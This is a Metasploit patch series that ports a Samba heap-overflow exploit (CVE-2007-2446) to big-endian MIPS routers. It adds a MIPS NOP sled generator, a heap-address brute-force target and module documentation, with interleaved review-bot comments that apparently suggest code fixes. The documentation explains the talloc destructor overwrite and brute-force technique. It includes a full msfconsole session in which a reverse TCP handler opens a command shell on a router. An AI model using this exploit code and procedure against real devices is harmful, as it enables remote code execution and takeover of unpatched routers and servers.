From 4d3611ceb9ec10656ee8821d536786b1dc51d3fe Mon Sep 17 00:00:00 2001 From: Jan Mitchell Date: Thu, 1 Sep 2016 09:55:08 +0100 Subject: [PATCH 1/5] Added MIPSBE support to Samba exploit. Added a MIPSBE nop generator --- modules/nops/mipsbe/better.rb | 108 ++++++++++++++++++++++++++++++++++ 1 file changed, 108 insertions(+) create mode 100644 modules/nops/mipsbe/better.rb diff --git a/modules/nops/mipsbe/better.rb b/modules/nops/mipsbe/better.rb new file mode 100644 index 0000000000..d68ef2ac6d --- /dev/null +++ b/modules/nops/mipsbe/better.rb 
@@ -0,0 +1,108 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +require 'msf/core' + + +### +# +# MixedNop +# ---------- +# +# This class implements a mixed NOP generator for MIPS (big endian) +# +### +class MetasploitModule < Msf::Nop + + + def initialize + super( + 'Name' => 'Better', + 'Alias' => 'mipsbe_better', + 'Description' => 'Better NOP generator', + 'Author' => 'jm', + 'License' => MSF_LICENSE, + 'Arch' => ARCH_MIPSBE) + + register_advanced_options( + [ + OptBool.new('RandomNops', [ false, "Generate a random NOP sled", true ]) + ], self.class) + end + + def get_register() + return rand(27) + 1 + end + + def make_bne(reg) + op = 0x14000000 + + reg = get_register() + offset = rand(65536) + + op = op | ( reg << 21 ) | ( reg << 16 ) | offset + return op + end + + def make_or(reg) + op = 0x00000025 + + op = op | ( reg << 21 ) | ( reg << 11 ) + return op + end + + def make_sll(reg) + op = 0x00000000 + + op = op | ( reg << 16 ) | ( reg << 11 ) + return op + end + + def make_sra(reg) + op = 0x00000003 + + op = op | ( reg << 16 ) | ( reg << 11 ) + return op + end + + def make_srl(reg) + op = 0x00000002 + + op = op | ( reg << 16 ) | ( reg << 11 ) + return op + end + + def make_xori(reg) + op = 0x38000000 + + op = op | ( reg << 21 ) | ( reg << 16 ) + return op + end + + def make_ori(reg) + op = 0x34000000 + + op = op | ( reg << 21 ) | ( reg << 16 ) + return op + end + + def generate_sled(length, opts) + + badchars = opts['BadChars'] || '' + random = opts['Random'] || datastore['RandomNops'] + nop_fn = [ :make_bne, :make_or, :make_sll, :make_sra, :make_srl, :make_xori, :make_ori ] + sled = '' + + for i in 1..length/4 do + n = nop_fn.sample + sled << [send(n, get_register())].pack("N*") + end + + return sled + end + +end + From 411689aa444fb098b0047be08c40b27fcbc84ff7 Mon Sep 17 00:00:00 2001 
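Review bot: `generate_sled` copies `opts['BadChars']` into `badchars` and then never consults it, so every packed word is emitted as-is and a sled can contain bytes the exploit has declared unusable — `make_bne` in particular folds a random 16-bit offset and a random register number into the encoding, so almost any byte value can appear. The `random` local is likewise assigned from `RandomNops` and ignored, so the advanced option registered in `initialize` has no effect. I would re-roll each instruction until `Rex::Text.badchar_index(insn, badchars)` is nil, with a bounded retry so a very restrictive BadChars set cannot spin forever, and either drop `random` or make it mean something; `make_bne` also discards its `reg` argument in favour of a second `get_register()` call, which is harmless but misleading. Whether returning nil on exhaustion is what `Msf::Nop` callers expect should be checked against the framework's other nop modules before merging.
```ruby
  def generate_sled(length, opts)
    badchars = opts['BadChars'] || ''
    nop_fn = [ :make_bne, :make_or, :make_sll, :make_sra, :make_srl, :make_xori, :make_ori ]
    sled = ''

    (length / 4).times do
      insn = nil
      # Re-roll the instruction until its 4-byte encoding is free of BadChars;
      # bounded so an over-restrictive set cannot loop forever.
      256.times do
        candidate = [send(nop_fn.sample, get_register())].pack('N')
        next if Rex::Text.badchar_index(candidate, badchars)
        insn = candidate
        break
      end
      return nil unless insn
      sled << insn
    end

    sled
  end
```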
From: Jan Mitchell Date: Thu, 1 Sep 2016 10:05:13 +0100 Subject: [PATCH 2/5] Adding changes to Samba exploit to target MIPSBE (this is for OpenWRT on a router --- .../exploits/linux/samba/lsa_transnames_heap.rb | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index 5a9c5dfb6a..82a8c8b8fe 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -168,6 +168,20 @@ class MetasploitModule < Msf::Exploit::Remote } ], + ['Linux Heap Brute Force (OpenWRT MIPS)', + { + 'Platform' => 'linux', + 'Arch' => [ ARCH_MIPSBE ], + 'Nops' => 64*1024, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x55900000 }, + 'Stop' => { 'Ret' => 0x559c0000 }, + 'Step' => 60*1024, + } + } + ], + ['DEBUG', { 'Platform' => 'linux', @@ -267,7 +281,7 @@ class MetasploitModule < Msf::Exploit::Remote talloc_magic = "\x70\xec\x14\xe8" # second talloc_chunk header - buf << 'A' * 8 # next, prev + buf << NDR.long(0) + NDR.long(0) # next, prev buf << NDR.long(0) + NDR.long(0) # parent, child buf << NDR.long(0) # refs buf << [target_addrs['Ret']].pack('V') # destructor From c102384b7a789b165a8aa657c2af620dbdf6f823 Mon Sep 17 00:00:00 2001 From: Jan Mitchell Date: Fri, 16 Sep 2016 11:28:08 +0100 Subject: [PATCH 3/5] Remove spaces at EOL --- modules/nops/mipsbe/better.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/nops/mipsbe/better.rb b/modules/nops/mipsbe/better.rb index d68ef2ac6d..1b2ad61986 100644 --- a/modules/nops/mipsbe/better.rb +++ b/modules/nops/mipsbe/better.rb @@ -33,7 +33,7 @@ class MetasploitModule < Msf::Nop ], self.class) end - def get_register() + def get_register() return rand(27) + 1 end @@ -49,7 +49,7 @@ class MetasploitModule < Msf::Nop def make_or(reg) op = 0x00000025 - + op = op | ( reg << 21 ) | ( reg << 11 ) return op end 
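Review bot: The new target's `Ret` window (`0x55900000`–`0x559c0000`) and 60 KiB step are tuned to a single device — the documentation added later in this series says the range was read from `/proc/<pid>/maps` on one router, and its sample session shows a WNR2200 running kernel 2.6.15 — but nothing in the target entry says so, and the name 'OpenWRT MIPS' reads as generic. I would add a comment above the entry, e.g. `# Ret range taken from /proc/<pid>/maps of a Netgear WNR2200 (OpenWRT, kernel 2.6.15); other MIPSBE devices or firmware builds will need their own Start/Stop`, and a second one noting that `Step` (60*1024) is smaller than `Nops` (64*1024), presumably so consecutive attempts overlap and no gap in the heap goes untried. The enclosing targets array starts and ends outside the hunk.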
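Review bot: The unchanged line directly after this change still emits the destructor pointer with `pack('V')`, i.e. little-endian, while the target added in this same commit is `ARCH_MIPSBE`, and nothing in the method explains why that is right for a big-endian server. If the overflowed bytes land in the talloc header raw, a big-endian Samba would read `0x55900000` byte-swapped and the brute-force range would be meaningless; if they are unmarshalled through the RPC parser according to the client's byte-order flag, 'V' is correct — the documented run reports a session, so I assume the latter, but a reader cannot tell from the code. I would record that on the line, e.g. `# NOTE(review): packed little-endian even for the MIPSBE target — confirm the server byte-swaps this via the RPC data representation rather than copying the bytes raw`. The enclosing method starts and ends outside the hunk.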
From 97b7819a08a69c3f3e715cde39e6b7cdc8df48f5 Mon Sep 17 00:00:00 2001 From: Jan Mitchell Date: Mon, 31 Oct 2016 14:47:19 +0000 Subject: [PATCH 4/5] Adding documentation for lsatransnames_heap --- .../linux/samba/lsa_transnames_heap.md | 88 +++++++++++++++++++ 1 file changed, 88 insertions(+) create mode 100644 documentation/modules/exploit/linux/samba/lsa_transnames_heap.md diff --git a/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md b/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md new file mode 100644 index 0000000000..489ee1d78e --- /dev/null +++ b/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md 
@@ -0,0 +1,88 @@ +## Vulnerable Application + + Samba 3.0.0 through 3.0.25rc3 are vulnerable to mulitple heap overflows. This module targets a heap overflow in the LsarLookupSids RPC call (CVE-2007-2446), causing an overflow in the function lsa\_io\_trans_name(). + The exploit uses the heap overflow to overwrite a function pointer contained in the metadata of the TALLOC memory allocator, a technique which only works on Samba versions 3.0.21-3.0.24. + +## Verification Steps + + 1. Start msfconsole + 2. Do: `use exploit/linux/samba/lsa_transnames_heap` + 3. Do: `show targets` to see the possible targets + 4. Do: `set target #` + 5. Do: `set rhost` + 6. Do: `exploit` + +## MIPS port + + This module was ported to exploit the MIPS architecture. After creating a suitable debugging environment using qemu to emulate Samba on a desktop PC the following steps were required: + +### MIPS nop generator + + The exploit uses a heap overflow to put a large nop sled in memory to decrease the accuracy needed in the initial redirection of code flow. A nop sled is a large section of contiguous instructions which do nothing. When code flow is redirected to a nop sled it will continue executing the effectless nops. At the end of the sled the true payload is added and execution will eventually hit this code. + A nop generator module was created for MIPS by creating a stream of random instructions which create no side-effects e.g. `sll $2, $2, 0` + +### Heap address bruteforce + + The exploit uses a brute force approach to minimise problems with unpredictability in heap layout. The exploit itself is run multiple times, each time targetting a different point in the heap with the change of execution flow. If all goes correctly then the nop sled will be hit and code execution will follow. If the nop sled is missed then the Samba process is likely to crash, which is generally not a problem as a new instance is forked for each incoming connection. 
In the event of a crash a new heap address is chosen and exploitation is attempted again. + When porting the exploit to a new system the approximate heap layout must be known in order to suitably attempt exploitation across all of the possible heap locations. As the MIPS port targetted a specific router the heap layout was determined by examining the ranges identified in _/proc//maps_ + +## Scenarios + + msf > use exploit/linux/samba/lsa\_transnames_heap + msf exploit(lsa\_transnames_heap) > set target 7 + target => 7 + msf exploit(lsa\_transnames_heap) > set rhost 192.168.1.1 + rhost => 192.168.1.1 + msf exploit(lsa\_transnames_heap) > show options + + Module options (exploit/linux/samba/lsa\_transnames_heap): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOST 192.168.1.1 yes The target address + RPORT 445 yes The SMB service port + SMBPIPE LSARPC yes The pipe name to use + + + Exploit target: + + Id Name + -- ---- + 7 Linux Heap Brute Force (OpenWRT MIPS) + + + msf exploit(lsa\_transnames_heap) > exploit + + [*] Started reverse TCP handler on 192.168.1.3:4444 + [*] 192.168.1.1:445 - Creating nop sled.... + [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x55900000... + [*] 192.168.1.1:445 - Connecting to the SMB service... + [*] 192.168.1.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Calling the vulnerable function... + [*] 192.168.1.1:445 - Server did not respond, this is expected + [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x5590f000... + [*] 192.168.1.1:445 - Connecting to the SMB service... + [*] 192.168.1.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... 
+ [*] 192.168.1.1:445 - Calling the vulnerable function... + [*] 192.168.1.1:445 - Server did not respond, this is expected + + ...Some intermediate attempts ommitted... + + [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x55996000... + [*] 192.168.1.1:445 - Connecting to the SMB service... + [*] 192.168.1.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Calling the vulnerable function... + [*] 192.168.1.1:445 - Server did not respond, this is expected + [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x559a5000... + [*] 192.168.1.1:445 - Connecting to the SMB service... + [*] 192.168.1.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.1[\lsarpc] ... + [*] 192.168.1.1:445 - Calling the vulnerable function... + [*] Command shell session 1 opened (192.168.1.3:4444 -> 192.168.1.1:4175) at 2016-10-31 14:00:33 +0000 + + uname -a + Linux WNR2200 2.6.15 #1 Mon Dec 23 15:58:24 CST 2013 mips unknown + From 312f33afa324e9ebe9ce9a20cdcacfffbc3ede39 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 15 Nov 2016 07:36:54 -0600 Subject: [PATCH 5/5] minor formatting updates --- .../exploit/linux/samba/lsa_transnames_heap.md | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md b/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md index 489ee1d78e..09ba3d7f25 100644 --- a/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md +++ b/documentation/modules/exploit/linux/samba/lsa_transnames_heap.md 
@@ -1,6 +1,7 @@ ## Vulnerable Application - Samba 3.0.0 through 3.0.25rc3 are vulnerable to mulitple heap overflows. This module targets a heap overflow in the LsarLookupSids RPC call (CVE-2007-2446), causing an overflow in the function lsa\_io\_trans_name(). + Samba 3.0.0 through 3.0.25rc3 are vulnerable to mulitple heap overflows. This module targets a heap overflow in the LsarLookupSids RPC call (CVE-2007-2446), causing an overflow in the function lsa\_io\_trans_name(). + The exploit uses the heap overflow to overwrite a function pointer contained in the metadata of the TALLOC memory allocator, a technique which only works on Samba versions 3.0.21-3.0.24. ## Verification Steps 
@@ -19,16 +20,18 @@ ### MIPS nop generator The exploit uses a heap overflow to put a large nop sled in memory to decrease the accuracy needed in the initial redirection of code flow. A nop sled is a large section of contiguous instructions which do nothing. When code flow is redirected to a nop sled it will continue executing the effectless nops. At the end of the sled the true payload is added and execution will eventually hit this code. + A nop generator module was created for MIPS by creating a stream of random instructions which create no side-effects e.g. `sll $2, $2, 0` - + ### Heap address bruteforce - The exploit uses a brute force approach to minimise problems with unpredictability in heap layout. The exploit itself is run multiple times, each time targetting a different point in the heap with the change of execution flow. If all goes correctly then the nop sled will be hit and code execution will follow. If the nop sled is missed then the Samba process is likely to crash, which is generally not a problem as a new instance is forked for each incoming connection. In the event of a crash a new heap address is chosen and exploitation is attempted again. - When porting the exploit to a new system the approximate heap layout must be known in order to suitably attempt exploitation across all of the possible heap locations. As the MIPS port targetted a specific router the heap layout was determined by examining the ranges identified in _/proc//maps_ + The exploit uses a brute force approach to minimise problems with unpredictability in heap layout. The exploit itself is run multiple times, each time targetting a different point in the heap with the change of execution flow. If all goes correctly, the nop sled will be hit and code execution will follow. If the nop sled is missed, the Samba process is likely to crash, which is generally not a problem as a new instance is forked for each incoming connection. 
In the event of a crash, a new heap address is chosen and exploitation is attempted again. + + When porting the exploit to a new system, the approximate heap layout must be known in order to suitably attempt exploitation across all of the possible heap locations. As the MIPS port targetted a specific router, the heap layout was determined by examining the ranges identified in _/proc//maps_ ## Scenarios - msf > use exploit/linux/samba/lsa\_transnames_heap + msf > use exploit/linux/samba/lsa\_transnames_heap msf exploit(lsa\_transnames_heap) > set target 7 target => 7 msf exploit(lsa\_transnames_heap) > set rhost 192.168.1.1 @@ -53,7 +56,7 @@ msf exploit(lsa\_transnames_heap) > exploit - [*] Started reverse TCP handler on 192.168.1.3:4444 + [*] Started reverse TCP handler on 192.168.1.3:4444 [*] 192.168.1.1:445 - Creating nop sled.... [*] 192.168.1.1:445 - Trying to exploit Samba with address 0x55900000... [*] 192.168.1.1:445 - Connecting to the SMB service...